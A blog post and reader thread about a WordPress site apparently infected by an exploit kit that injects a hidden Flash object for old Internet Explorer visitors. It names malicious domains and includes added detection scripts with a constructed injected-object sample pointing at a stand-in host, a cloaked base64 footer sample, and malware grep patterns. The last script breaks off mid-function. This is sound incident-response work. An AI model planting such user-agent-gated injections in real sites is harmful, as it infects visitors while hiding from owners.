EDIT: Should be fixed now. I’ll have another post following up on this once I’m sure it’s gone. Let me know if you see anything fishy that isn’t an actual fish.
So for a couple of months now I’ve been getting these really strange reports from a small group of people[1] that my site had been “hacked”. Here is one:
Microsoft Security Essentials blocked content on this website
qwe.systemsviensows.asia
Hosted by: http://www.shamusyoung.com
Microsoft Security Essentials blocked this site because it might contain threats to your PC or your privacy.
And one more:
Got another one. “qwe.arteriosclerosisobliteranas.net”
Also: I dropped my laptop and killed my hard drive a few days ago. I just got a new one installed and just now got the OS and everything updated and running. So it's not a virus or malware on my end that's doing it, this is a totally new hard drive and your website was just about one of the first ones I went to (after gmail and facebook, and I don't think I'm getting malware from them.)
It’s very tempting to say, “With so few reports, this can’t be a problem on my end.” But I want to be thorough. Furthermore, maybe scammers have gotten smarter and have invented malware that goes dormant in some cases instead of relentlessly attacking. “But it seems to work fine for me!” is perhaps the greatest shield a virus can have. It’s effectively a real-world implementation of the SEP invisibility field.
Some facts:
- I have no idea what the attack looks like. We only have Microsoft Security Essentials to go by here. Again, Microsoft isn’t exactly your go-to company for security, but for the sake of this exercise we’re going to assume MSE is correct.
- All reports involve a similar text, but with a different external URL. Always in the form of qwe.[randomwords].net.
- I use Chrome, and I viewed the site normally logged in as admin, anonymously (using the incognito feature) and using IE 11. Using all three, I’ve searched the resulting page source and have never found any URLs of the offending form, or anything else suspicious. However, this doesn’t mean the site is safe, because…
- This site runs on WordPress, which runs on PHP. If bad code was installed on my site somehow, then PHP could be showing it in some cases and not others. This might sound far-fetched, but…
- My wife used to keep a blog. She tapered off after a while and forgot about it. It languished for a year or more, neglected. Then she noticed this goofy-ass link right in the middle of get free pills online bullshiturl.com a sentence, just like this one. Either her webhost got hacked, or her super-old, unpatched, neglected WordPress install got hacked. In either case, her theme had been corrupted to insert these bogus links “sometimes”.
However, she was using a super-common built-in theme, which made her an easy target. Even if someone did gain access to my server, they would need to craft an attack specific to my site, because my theme is custom-built and is pretty unorthodox. I’m not saying it’s impossible, but this isn’t the kind of easy generalized target that hackers would go for. Heck, if you can hack my theme and hide the hack from me, then you’re wasting your time with this malware bullshit. Just get some contract work untangling horrific PHP catastrophes. The pay and the job security are better, and nobody will throw you in prison for it.
Again, this suggests we’re not dealing with a real threat. Except…
- I’ve typed bits of this into Google, and come up completely empty. That’s unheard of. If you search for “Why did my peanut butter and jelly sandwich catch fire” you’ll probably find links to a 2010 forum thread where a bunch of people had the same problem. But these searches come up with nothing. This is probably the most interesting piece of evidence so far, and has me leaning towards thinking that the problem is real. After all, if MSE was throwing false flags, you can bet we’d be up to our eyebrows in analysis, apologists, suggestions to “LOL GET LINUX”, and godawful workarounds.
I am so stumped at this point that I have no choice but to crowdsource this. Have you gotten warnings from MSE? Can you share a screenshot? When did the problem first appear? Do you run a website, and have you gotten these kinds of reports?
Footnotes:
[1] Less than five-ish?
Well, avast! doesn’t like the look of that url, so apparently it isn’t just a false alarm.
Hypothetically it could be that a router somewhere is tampering with the http packets, but outside of extremely unlikely cases that would either make more people encounter the problem or cause the people who have it to get it on other sites.
And here I thought it was just me. I use IE11 (I know, I know), and for…the past couple of weeks, I guess? MSSE will randomly flash a warning at me like the ones you’re talking about. Sometimes 3-4 times in a row, sometimes once a day (and the last couple days have been clear entirely – read on). Couldn’t figure out why, but it’s definitely here and only here.
Perhaps coincidentally, and perhaps not, yesterday I came home to find five odd copies of a process with eight random letters for a name attempting to bypass UAC and do…something. And it said it was Google Chrome, which it obviously was not. A bit of googling on “fake google chrome” got me a few pages like this one but very little else. Almost no internet presence I could find.
A bit of hair pulling, Google reading and some MSSE and Malwarebytes scans that turned up precisely nothing later, I finally found a dll with a gibberish eight letter name dated yesterday lurking in Users/Me/AppData/LocalLow/ and deleting it SEEMS to have solved my problem (but of course nothing detected it in the first place, so, uh…). Wish I’d taken screenshots, but hopefully I’m being descriptive enough here.
And coincidentally or no, MSSE isn’t angry at your blog anymore, and warnings have gone from “all day every day” to “we’re all fine here now, thank you. How are you?”
I have no idea if any of this is related. Cause? Symptom? I dunno. But maybe it is related, so here you are. Hope it helps.
It occurs to me to also add:
Both the warnings and the malware were specific to my Windows 7 desktop. My Windows 8.1 laptop right next to it also running IE 11 and 8.1’s version of MSSE, sees nothing of either one, even when I’ve been here on both machines at the same time.
Maybe that data point is also useful.
I’m actually way more trusting of Microsoft than pretty much any other vendor in regards to virus protection – they have a vested interest in viruses being stopped; viruses make Windows look bad, which makes people more likely to buy a Mac. Companies whose livelihood depends on making AV software have a vested interest in viruses existing – it’s how they make their money!
Too bad Microsoft Security Essentials/Defender is historically one of the worst and most ineffectual anti-malware programs of all time (falling well, well below industry average detection rates: http://www.av-test.org/en/antivirus/home-windows/windows-7/august-2014/microsoft-security-essentials-4.5-143171/). Microsoft has even admitted in the past that they purposely avoid blocking certain unwanted software, advertising, etc. because they do not want to endanger business relationships.
These days most anti-virus programs are pretty competitive, but you should always go with a paid one because those companies have a vested interest in providing good ongoing security – if they don’t, then they know people will jump ship to another vendor.
If that’s true, how are Symantec and Norton still in existence? :)
For the same reason that people still smoke and drink too much: You can tell ’em and tell ’em and tell ’em … … and they still won’t listen!
Every company I’ve worked at uses Symantec so I think they must just have a very good business sales team.
MSE has the nice little feature of not degrading into a massive resource hog and screwing up the OS, something which I haven’t been able to get with any of the other free AVs out there. I also don’t recall MSE ever having an incident where it falsely flagged critical system files as viruses, preventing the OS from booting.
It’s only the worst performing anti-virus if you only assess them on their performance against new malware. MSE doesn’t have heuristics (which is the resource hog in AVs) and can be a bit slow to pick that stuff up. It has a 100% detection rate for the common and older malware, but that’s never tested by the sites that hammer MSE (and I remember the pre-MSE days when 100% detection rates on common malware weren’t a given for an AV). It also never has false positives.
So MSE is bad if you need protection against the latest and greatest malware, which mostly describes people doing very sensitive work or businesses that can’t risk that sort of problem. Most people aren’t going to run into malware that’s not in the definitions, however. It’s a tradeoff of performance vs security against the very latest malware.
Also, I’ve never seen MSE saying they don’t flag some malware for business reasons. They probably don’t pick up some adware and tracking cookies but many AVs have that same problem.
I’ve been dinged by several script-jacking stuff that gets past AVG. Usual modus operandi is:
1.) Script on a lower end site, wikis and game pages are common, got one off the Resident Evil Wikia.
2.) Gives bullshit “AV” detection, asks to install.
3.) Does it anyway, somehow it gets more and more of what it needs onto my machine.
4.) Uninstalls any Anti-virus capable of dealing with it.
5.) If it detects any anti-virus that could hurt it, proceeds to initiate a shutdown command that brings the computer down in a minute.
I’ve only ever gotten around this two ways (It’s come up three times in my household). Restoring a restore point, or with my current machine, I clocked it all the way up and installed MSE, which pinged it so I could remove it.
As a result, I use adblock(Obviously, manage a whitelist for sites that you want to support) and script-block by default, with AVG and MSE.
Also, down below, HiEv has a very good point. AV companies have a vested interest in Viruses existing in UNPROTECTED machines. If the doctor made you sick why the hell would you go back? As it turns out, he can cure your ailments and set your broken limbs, because he isn’t a fraud. And even though they have an interest in it, propagating viruses is illegal, and there are plenty of people willing to do that for nothing, so why would an AV company do it?
I’d say your example makes a good argument that AVs aren’t the cure-all that they’re sold as. Many AV suites can’t stop plain old ransomware let alone the more serious stuff that ruins a system the second it gets executed. That’s why there’s a whole lot of specialised removal tools. I also agree that script-blockers are a no-brainer for security – many sites use a dozen or more sources of javascript which means a dozen or more vectors of attack. Adblock is also vital as vetting for ads can be terrible and I believe even Google has let malware-infected ads slip through.
And whilst I doubt that antivirus companies would actively be putting viruses out in the wild due to sheer illegality, it is in their interest to make their products look as important as possible. They do this by overstating the prevalence of viruses, the ability of their software to stop them and the inability of simple and free solutions like MSE to stop them instead. And yes, the testing companies aren’t exactly innocent in this despite their independence. Just look at how much they’re talking up the problem of viruses on Android literally right now. People being afraid of malware and not trusting their AV drives traffic.
The above probably sounds like crazy conspiracy talk, but it’s just the natural result of companies wanting to make their products popular. Just like how advertising focuses on making you feel like you need the product.
Ugh. That’s the same kind of crazy conspiracy talk that makes some loons claim that doctors would rather see you sick so they can get paid to fix you. :-P
The fact is, if an anti-virus company ever got caught intentionally doing something like that they’d get shut down so fast it would make your head spin.
And, as others have mentioned, Microsoft’s AV software is terrible, and has a history of being terrible. Microsoft simply doesn’t have the agility to deal with new threats either.
So, in the end, your putting your trust in the wrong people for completely unfounded and irrational reasons that are counter to observable reality.
I guess it can’t be all bad but did you ever try to download Firefox with IE11?
It will bombard you with warnings about unsecure and not recommended and dangerous content, untrusted certificates and whathaveyou … it takes a lot of willpower not to believe that the mozilla website is being run or has been taken over by very very evil people who want to ruin your life…
If that kind of market political thing gets into their process, then I don’t think I want to trust them anymore.
Using Opera, and Comodo Internet Security. No Warnings or rogue processes or dlls.
Recent Win7, recent FF (34.05) + recent MSE: nothing. Never had anything like it.
No idea if this is going to help, but searching for “qwe malware” on google gives some results, which point to something called Angler Exploit Kit (aka Angler EK).
Windows 7 with Chrome and avast and never got a virus warning or anything similar. The only unusual thing that happened was yesterday or the day before: the site didn’t load, completely white screen with DATABASE ERROR in the upper left.
So that wasn’t just specific to me. Though it did happen to me occasionally in the past few weeks. But only maybe once in a day or two, so I didn’t think it was connected to the site.
I got the same error yesterday, so I shortened the address from http://www.shamusyoung.com/twentysided to http://www.shamusyoung.com. That was fine, but the link to the diecast from there produced a database error. My history reports this at 7:32pm gmt, I revisited at 10.02pm gmt and it was fine.
I’ve gotten the database error from this site once or twice as well. I think the most recent was a few weeks ago.
As for malware, I run my site off HostingMatters, and a couple of years back, I happened to be looking at the directory structure of the site (something I never need to do.) I found an entire directory of medical-related ads, placed there somehow. I changed the password and haven’t seen it again.
I also had the “Unable to Connect to Database Error” yesterday. I assumed that Shamus was monkeying around with the site or something. It went away by the time Spoiler Warning was uploaded.
Sometimes irresponsive links on my end as well. Waiting may have helped. New phenom, since the Star Trek posts more or less. Didn’t happen before, and became a not unusual occurrence all of a sudden.
I assumed the problem was on my end, but I guess not.
Oh, so many people saw that? Me too… Thought maybe server is rebooting or something.
I don’t know much (or really anything) about making or running websites, but is there any way to ask Microsoft what they think they’re seeing?
This should answer your question:
There was a pilot flying a small helicopter, with several very important executives on board. As they approached the Seattle airport through thick fog with less than 10 miles visibility, his instruments went out. So, he began circling around looking for a landmark. After some time he started running low on fuel and the passengers were getting anxious.
Finally, a small opening in the fog appeared and the pilot saw a tall building with one guy working alone on the top floor. The pilot approached the building, opened the window and shouted to the guy, “Hey, where am I?”
The office worker replied, “You’re in a helicopter.”
The pilot closed the window, executed a 275 degree turn and executed a perfect blind landing on the runway 5 miles away. Just as the helicopter came to a halt, so did the engine as the fuel ran out.
The passengers were amazed and one asked how he did it.
“Simple”, replied the pilot, “I asked the guy in that building a simple question. The answer he gave me was 100 percent correct but absolutely useless, therefore that must be Microsoft’s support office and from there the airport is just five miles due East.”
Spot on, DL. Spot on.
That’s a variation on another joke. A guy in a balloon asks someone on the ground, “where am I?” and he answers “20 feet up in a balloon.” The guy in the balloon says “you must be an engineer — your answer was absolutely correct, but useless.”
The guy on the ground says “you must be a manager. You don’t know where you are, you need help, and now you think it’s my fault!”
Usually I hear that one in reference to mathematicians, not engineers. Good engineers are practical. :(
And good mathematicians are right
In that case I don’t think I’ve ever met one of these “good engineers”.
Getting the practical part right is grunt work for the lowly draftsmen.
Oh man so spot on. I work in Sharepoint all day and if you want to do anything beyond being a “power user*”, Microsoft’s sites and documentation are next to useless. I only get results fiddling around myself, creating a hack of some kind (hack in its original benign meaning) or getting tips from other independent developer’s blogs (or stack overflow).
Even when their guys do write a blog about how to do something, it often only works for their specific example and it doesn’t give me enough information about how a developer might have gone about figuring that out himself.
A 275 degree turn would be wrong. As would a turn to heading 275, if the airport is east of the building.
Daemian’s clearly not an ambi-turner
I have also gotten these warnings (Win 7, IE but not Firefox). Not from MSE, though, but from my recently installed AVG security suite.
I’ve had similar warnings from other sites that use ads with tracking cookies for product displays (ebay, gumtree etc). I’ve always wondered why your site throws up these warnings even though you don’t use ads anymore. I take it there isn’t any ad code left hiding somewhere?
I’d usually assume these were in the comments section, but since other commenters seems to indicate this only happens in IE on Win7, it might be a clever bit of malware that only injects itself for that specific combination…
Can you go through your spam-filtered comments? Is there some window of opportunity where spam links could creep in before they’re blocked and the comment removed?
What external resources do you use? Javascript libraries, WordPress CSS, WordPress PHP, that sort of thing.
It’s a pity the problem isn’t reproducible but then again that’d be an effective way to hide malware, to make it only do its thing in certain situations and escape notice.
Perhaps it would be useful if the people who experience this warning can send you a copy of the HTML code their browser is seeing? (haven’t seen it myself, I’m not on Windows).
This way maybe you can get a clue as to where the problem lies (for example if a specific plug-in is the problem).
Apparently alt+v+c will open the source in IE (only 8?) http://www.shortcutworld.com/en/win/Internet-Explorer_8.html
Couple of things, though I don’t have a whole lot of time this morning.
If you think your site’s compromised, you can try one of the wordpress scanner plugins or get Google to help out (https://support.google.com/webmasters/topic/4596795?hl=en&ref_topic=4558844).
You can also use resources like urlquery.net that will detail exactly what resources it gets and let you try different user agents (spoiler alert, this page doesn’t seem to access anything suspicious with IE6).
Exploit kits tend to be very selective about their targets, so as to stay active as long as possible. They employ multiple levels of redirection and gather information about the browser before determining both if they’ll serve up an exploit as well as which one. This can explain why you don’t see anything on FF/Linux, while IE on Windows gets popped. Mentioning the actual browser version and plugins installed makes a difference as well (what version of Java/Silverlight/Flash?).
As a quick check, try checking the timestamps on your included files (particularly php and js). See if anything was modified or recently changed. If you’re on a shared host provider, keep in mind it may not have been a vulnerability in your site, but someone else’s that ended up granting access to the box.
If possible, try to find out exactly what page(s) they’re accessing. Check your logs for obviously suspicious access, particularly for domains or IP blocks you don’t recognize or are unique.
Anyone who’s seen this virus warning message should post their exact user agent string. If you’re right, it could be used to get the attack to come up reliably, so that the problem can be dissected.
I can reproduce the virus warning pretty readily: how can I find my exact user agent string so I can post it and help out?
http://www.useragentstring.com/ was the first Google result for User Agent String. It will show up in the box under the label “User Agent String explained :”
Though reading further, it seems that the cause may have been pin-pointed.
Nothing here. Running Windows 8.1 fully patched, latest Chrome, avast! and MS Defender have been all nice and quiet.
Also nothing here – Firefox, MSE, Malwarebytes Pro, SpywareBlaster, Adblock Plus. No alerts or anything else that might seem suspicious.
Nothing here either. Win7, Firefox 32. Microsoft Security Essentials, Malwarebytes, Spybot S&D.
Though FF is having problems with flash and refuses to play it on this site (At least the Spoiler Warning videos) but that is my own fault.
Yes, your WordPress blog has picked up something, and yes, it’s doing something to mask itself. If I query this blog with any of my usual user-agent strings, I get a clean blog. If I query this blog masquerading as an old IE, I’m getting additional HTML that embeds a flash movie to what definitely looks like additional bad stuff.
I’ll email details, since I’d like to send you the details so you can help narrow the search for the problem in the PHP but I don’t want your comment section to have any references to the URLs in question.
Edit: email sent. If it doesn’t come through in a bit, check your spam folder… as the email DOES contain hostile code, it is a prime candidate for getting caught! Otherwise, let me know (email’s on this comment) and I’ll work out some other way to send it.
Try sending it as a password-protected zip (with the file extension changed). That’s more likely to make it through filters.
Sorry I overlooked the qwe.[randomwords].net part. That’s Angler performing a redirect to a landing page.
Here’s an example of the chain:
http://www.malware-traffic-analysis.net/2014/09/26/index.html
Check your logs carefully to try and pinpoint a start date and pages you don’t recognize getting served up.
Try grepping through your pages and try to find instances like ‘window.self.location.replace’, ‘document.location.replace’, ‘window.location’, or other similar strings.
Also check to see what software your server is running. What version of Apache? SSL? Database?
…and also check your WordPress themes. Your footer indicates a modified version of Sandbox. There appears to be at least one major vulnerability associated with it that allows arbitrary file uploads.
http://www.vfocus.net/art/20130128/10664.html
Right now if you Google “why did my peanut butter and jelly sandwich catch fire?” the first three results are quotes from St. Elmo’s Fire, a buzzfeed article on how to make a better pbj, and this page. Ooh, fifth link actually involves setting stuff on fire (but just a peanut, not a pbj).
When I checked just now, this page was the number two result for “Why did my peanut butter and jelly sandwich catch fire”! Come on, guys. Let’s go all the way to the top!
I found something suspicious just now. When I visit this very page using Windows 7 IE11 user agent string, it once served me an invisible Flash object. Here’s the diff against the normal page: http://pastebin.com/KXnKU4pf The object itself is served by oqesoxu.uk.to (in this case), which belongs to a dynamic DNS service afraid.org. Very suspicious.
I downloaded the page using wget in all cases, so it was just the user agent string that triggered this.
Followup edit: It seems to only attack any IP once. If I change IP addresses and visit again, I get the attack again immediately. Here’s another diff: http://pastebin.com/iFe9LTkc Notice the malicious URL changed.
I can confirm this. Like Chris said, I only saw the flash injected on the first IE user agent I tried.
Commands and output pasted here: https://gist.github.com/anonymous/95a6bb944c7623390367
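Here is an added script, not the commenters’ own code, that automates the check Chris and W describe above: fetch a page under several User-Agent strings, diff each response against a baseline, and flag the markers quoted in the thread (the Flash classid, object/embed tags, off-site URLs). The UA strings, host names and sample pages in it are constructed for the demo.

```python
"""
Added example (not code from the post or its commenters): fetch the same page
under several User-Agent strings and diff the responses, the way Chris and W
did with wget, then flag markup that looks like the injected Flash object they
describe. Host names and the sample HTML below are constructed for the demo.
"""
import difflib
import re
import urllib.request
from urllib.parse import urlparse

# Constructed UA strings: a modern browser as the baseline, old IE as the bait.
USER_AGENTS = {
    "chrome": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) "
              "Chrome/39.0.2171.95 Safari/537.36",
    "ie11-win7": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "ie8-winxp": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)",
}

# The Flash ActiveX classid quoted in the thread, plus the tags that carry it.
FLASH_CLSID = "d27cdb6e-ae6d-11cf-96b8-444553540000"
OBJECT_RE = re.compile(r"<(object|embed|iframe)\b[^>]*>", re.IGNORECASE)
URL_ATTR_RE = re.compile(r"""(?:src|data|value)\s*=\s*["']?(https?://[^"'\s>]+)""", re.IGNORECASE)


def fetch(url, user_agent, timeout=20):
    """Fetch url with an explicit UA. Network-only; the offline demo never calls it."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def added_lines(baseline_html, suspect_html):
    """Lines present in the suspect response but absent from the baseline."""
    diff = difflib.unified_diff(baseline_html.splitlines(), suspect_html.splitlines(),
                                lineterm="", n=0)
    return [line[1:] for line in diff if line.startswith("+") and not line.startswith("+++")]


def suspicious_markup(html, site_host):
    """Findings for a chunk of HTML: the Flash clsid, object/embed/iframe tags,
    and URLs pointing at hosts outside the site's own domain."""
    findings = []
    if FLASH_CLSID in html.lower():
        findings.append("flash-clsid")
    for m in OBJECT_RE.finditer(html):
        findings.append("tag:" + m.group(1).lower())
    for m in URL_ATTR_RE.finditer(html):
        host = urlparse(m.group(1)).hostname or ""
        if host and not host.endswith(site_host):
            findings.append("offsite:" + host)
    return findings


def compare_user_agents(responses, site_host, baseline="chrome"):
    """responses: {ua_name: html}. Reports what each non-baseline UA received extra."""
    report = {}
    for name, html in responses.items():
        if name == baseline:
            continue
        extra = added_lines(responses[baseline], html)
        report[name] = suspicious_markup("\n".join(extra), site_host)
    return report


# Constructed sample: a clean page and the same page with an invisible object
# injected right before </body>, nested in its own <body> as the thread describes.
CLEAN_PAGE = """<html><head><title>Twenty Sided</title></head>
<body>
<div id="content">Posts go here.</div>
<script src="http://www.shamusyoung.com/wp-includes/js/jquery.js"></script>
</body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace("</body></html>", """<body>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1">
<param name="movie" value="http://example-dyndns-host.invalid/x.swf">
</object></body>
</body></html>""")


def demo():
    # A single clean fetch is not proof of absence: the thread reports the
    # injection appears only once per client IP, so repeat from another address.
    responses = {"chrome": CLEAN_PAGE, "ie11-win7": INJECTED_PAGE, "ie8-winxp": CLEAN_PAGE}
    return compare_user_agents(responses, "shamusyoung.com")


if __name__ == "__main__":
    for ua, findings in demo().items():
        print(ua, findings or "clean")
```

To run it against a live site, build `responses` with `fetch(url, ua)` for each entry in `USER_AGENTS`, ideally from an address that has not visited the page yet.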
This is the most concrete lead so far. Thanks to both of you.
Sadly, I have NO idea where to look from here. Typical Malware sites tell you what the thing looks like on your machine, but not what it looks like on your website. Moreover, the control panel I’m using is a ridiculous pile of crap that doesn’t offer searching in sub-directories, so even if I knew exactly what the thing was called I wouldn’t have a way to find it, short of manually reading through hundreds and hundreds of directories. (WordPress is sprawling.)
Still, it’s looking more like infected=yes.
Is there an option to export or back up the site from the control panel? Use that to get a local file dump you can look through.
Start by looking at the homepage or root for the blog. Search for URLs that don’t reference your site. Also search for php includes you don’t recognize as well as common include files that are part of the page template. The classid ‘d27cdb6e-ae6d-11cf-96b8-444553540000’ appears in both of the snippets from Chris and W, so that may be a fingerprint as well.
Maybe also search for “HTTP_USER_AGENT” and “navigator.userAgent” or anything similar as these could also be obfuscated.
This is obviously the code that’s detecting the user agent, so even if the outputted code changes, this is probably there somewhere.
I don’t know much about wordpress, but you are definitely getting html injection right before the closing body tag. (Oddly it is creating its own body tag inside of your body tag. Stupid malware isn’t html compliant!)
The first place I would look would be whatever module/template handles footers.
Barring that, you could just grep the wordpress directory for something like “clsid:” or maybe “EITest” which seem unique enough.
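The server-side triage the last few comments suggest, as an added example that is not the commenters’ own code: walk a downloaded copy of the WordPress tree, grep each PHP/JS/HTML file for the user-agent checks, redirect calls and “clsid:”/“EITest” markers named above (plus the eval/base64 wrappers that usually hide them), and list files modified recently, as an earlier comment recommends. The directory layout and sample files are constructed for the demo.

```python
"""
Added example (not from the post or its commenters): a local triage scan of a
downloaded WordPress tree for the strings suggested in the thread
(HTTP_USER_AGENT, navigator.userAgent, window.location.replace, clsid:, EITest)
plus common PHP obfuscation wrappers, and for recently modified files.
The directory layout and the sample files are constructed for the demo.
"""
import os
import re
import tempfile
import time

# Patterns quoted in the thread, plus eval/base64 wrappers that often carry them.
INDICATORS = {
    "ua-check-php": re.compile(r"HTTP_USER_AGENT", re.IGNORECASE),
    "ua-check-js": re.compile(r"navigator\.userAgent", re.IGNORECASE),
    "redirect": re.compile(r"(?:window|document|self)\.location(?:\.replace)?", re.IGNORECASE),
    "flash-clsid": re.compile(r"clsid:", re.IGNORECASE),
    "eitest": re.compile(r"EITest"),
    "obfuscation": re.compile(r"\b(?:eval|base64_decode|gzinflate|str_rot13)\s*\(", re.IGNORECASE),
}
SCAN_EXT = (".php", ".js", ".html", ".htm")
# Legitimate WordPress code also reads HTTP_USER_AGENT and uses eval/base64 in a
# few places, so hits are leads for a human to read, not verdicts; weight them by
# file path (theme footers, uploads) and by modification time.


def scan_file(path):
    """Sorted indicator names that match anywhere in the file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_tree(root, modified_within_days=None):
    """Return {relative path: {"hits": [...], "mtime": epoch, "recent": bool}} for
    every scanned file with a hit or (if a window is given) modified in that window."""
    cutoff = None if modified_within_days is None else time.time() - modified_within_days * 86400
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.lower().endswith(SCAN_EXT):
                continue
            full = os.path.join(dirpath, fn)
            mtime = os.path.getmtime(full)
            hits = scan_file(full)
            recent = cutoff is not None and mtime >= cutoff
            if hits or recent:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                results[rel] = {"hits": hits, "mtime": mtime, "recent": recent}
    return results


def build_sample_tree():
    """Constructed sample: a theme footer with UA-gated, base64-wrapped output,
    a clean header, and an old untouched script. Returns the temp root."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    theme = os.path.join(root, "wp-content", "themes", "sandbox")
    os.makedirs(theme)
    with open(os.path.join(theme, "footer.php"), "w") as fh:
        fh.write('<?php if (stripos($_SERVER["HTTP_USER_AGENT"], "MSIE") !== false) {\n'
                 '  echo base64_decode($payload); } ?>\n</body></html>\n')
    with open(os.path.join(theme, "header.php"), "w") as fh:
        fh.write("<html><head><title><?php wp_title(); ?></title></head>\n")
    old = os.path.join(root, "wp-includes", "old.js")
    os.makedirs(os.path.dirname(old))
    with open(old, "w") as fh:
        fh.write("var x = 1;\n")
    past = time.time() - 400 * 86400  # backdate so it falls outside the window
    os.utime(old, (past, past))
    return root


def demo():
    """Scan the constructed tree, reporting hits and anything touched in 30 days."""
    return scan_tree(build_sample_tree(), modified_within_days=30)


if __name__ == "__main__":
    for rel, info in sorted(demo().items()):
        when = time.strftime("%Y-%m-%d", time.localtime(info["mtime"]))
        flag = " (recent)" if info["recent"] else ""
        print(f"{rel}: hits={info['hits'] or '-'} modified={when}{flag}")
```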
I’ve occasionally gotten notifications about a strange file being downloaded when I visited the site (chrome, Win 8.1). Nothing got flagged by Avast.
I thought that perhaps the proxy I use had been affected, but given this update I suspect it may be related to this site specifically instead.
This blog post MIGHT be relevant. Not sure, I don’t know enough about this stuff, but it’s recent and it does present similar code injections…
https://blog.malwarebytes.org/exploits-2/2014/10/exposing-the-flash-eitest-malware-campaign/
If it’s only hitting each IP address once, it’s got to be storing them somewhere. If it’s smart enough to not hit incognito users repeatedly, it’s not using anything client-assisted, like session tokens.
Once you find where the list of IPs already hit is, you might be able to grep keywords from there to find the offending file.
Maybe a diff on the database?
I guess that would explain the weirdly intermittent behavior, if it stores a list of IPs it’s already attempted to infect within the last while. Not only would that mean that it doesn’t repeat when people reload the page, port forwarding and such can mean that multiple people can have the same IP as far as the site is concerned.
That matches my experience exactly. Every day when I start up IE and check the blog I get the warning from Microsoft Security Essentials. If I try to access the blog again everything works just fine, no problem.
I didn’t have any of these errors before, but when I just visited the site a moment ago, avast! gave me 5 hostile program warnings in a brief 5-10 minute span of time.
It has never done this before, and it hasn’t done this since. Don’t know if this will help, but here it is.
Aw man, I was here because my sandwich caught on fire and I needed to know what to do. So much for my kitchen…
Well if it’s a non-grease fire you want to smother it, and if it’s a grease fire you want to douse it with water.
…Did I get those two things mixed up? Eh, probably not. I’m sure it’s fine.
Whether or not it’s a grease fire may depend on the brands and types of peanut butter and jelly you use. Your best bet is to reinstall the mixture on new slices of bread and see if the problem persists.
You may also want to check the ingredients list for the peanut butter, and if necessary, compile a new batch from source.
Why even bother with that? Just make a BLT.
Have you tried turning the toaster on and off again?
Maybe you’re being gaslighted. They got you looking for errors that aren’t there to drive you mad.
There are some extensions out there that are doing some nefarious stuff with “keyword” pop-up advertisements in the text of the web page. Those would look to MSE like they were coming from the page themselves, but they’re strictly local stuff.
Does anyone else get a message from Firefox saying that shamusyoung.com is asking to use quick time (with the option to allow or block it)? It only happens about a third of the time, only on the front page, and it doesn’t seem to matter what articles are on the front page.
Running Vista, Firefox 34.0.5, and Norton Antivirus (because my ISP offers it free, so what the hell).
Shamus’ blog hands you a quick time event..?
The End is nigh! *burrows under sofa cushions* Death! War! Famine! Spam!
Or.. *pokes head out between cushions* ..maybe it’s an experiment for a non-irritating QTE creation project? I mean, it does ask nicely and blocking is (allegedly) an option..
I know, right? I’m still figuring out how to press the triangle button on my keyboard! ;)
(Meaning Apple Quicktime, though. The software that once upon a time everything and its mother needed a good install on your system of, but seems to be existing mostly these days as a way to play video and audio in browser that doesn’t have a youtube embed. Which…would probably be the Diecast, now that I’m properly thinking about it. *smacks forehead* Although in my defense, my browser never had an issue with it before (but Firefox is as always in a perpetual state of flux).)
This is fine, but I do have this other weird problem with your site whereby I can’t access it from my main computer, but every other computer I use (my laptop – same network, computer at work – different network) is fine, so I dunno what’s causing that.
I run ScriptSafe, which enumerates all the sources of active content on a page, on Chrome on Windows 10 TP. It has never indicated any kind of unusual XSS or content of any kind from any of those sources. The dev console does not indicate content from those domains, or other weird ones, was loaded.
Of course, as you stated, if it is intermittent and clever then this proves nothing. I will be on the lookout for any tampering on this site and report it if noticed.
Looks like you’ve gotten plenty of feedback on this line already, but I’ll go ahead and add that, several weeks ago, I’d get the MSE warning for your site, but ONLY from Internet Explorer. Chrome never bothered me. I just tried it on IE again now, see if I could get the specific message for you, but I came through alright this time.
My only suggestion would be to download your website (minus the uploads folder, for a start) to a folder on your local machine (or a sandboxed VM if you’re worried). Then use a search-in-files tool to search for various strings from the ones mentioned above. Sublime Text is great for this, and regular expressions will help you a lot too.
My first thought was that it might be some rogue JS injecting the links, therefore they wouldn’t show up on view-source, but they wouldn’t be there via wget either, so I’m guessing it’s buried (and probably obfuscated) in PHP code or something that’s being included as PHP.
It’s not just themes that are vulnerable, idiots keep coming up in plugins too.
Disclaimer: I’m a PHP developer but have little WordPress experience.
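A scripted version of that search-in-files step, as an added example and not the commenter’s own tooling: it walks a downloaded copy of the site and flags both the qwe.[randomwords].tld hostname shape from the reports and the eval(base64_decode(...)) family of obfuscated PHP. The sample files it scans are constructed inline, not real site content.

```python
import os
import re
import tempfile

# Hostname shape from the MSE reports in the post: qwe.<randomwords>.<tld>
SUSPECT_HOST = re.compile(r"\bqwe\.[a-z0-9-]+\.[a-z]{2,}\b", re.IGNORECASE)
# Obfuscation idioms typical of injected PHP: eval of a decoded/inflated string
OBFUSCATION = re.compile(
    r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13|gzuncompress)\s*\(",
    re.IGNORECASE)
# Only text-ish files are scanned; the uploads folder is excluded by extension
SCAN_EXTENSIONS = {".php", ".js", ".html", ".htm", ".inc", ".txt"}

def scan_tree(root):
    """Walk a downloaded site copy; return (relative path, line no, kind, match) tuples."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                for line_no, line in enumerate(fh, 1):
                    for m in SUSPECT_HOST.finditer(line):
                        hits.append((rel, line_no, "host", m.group(0)))
                    for m in OBFUSCATION.finditer(line):
                        hits.append((rel, line_no, "obfuscation", m.group(0)))
    return hits

def build_sample_site():
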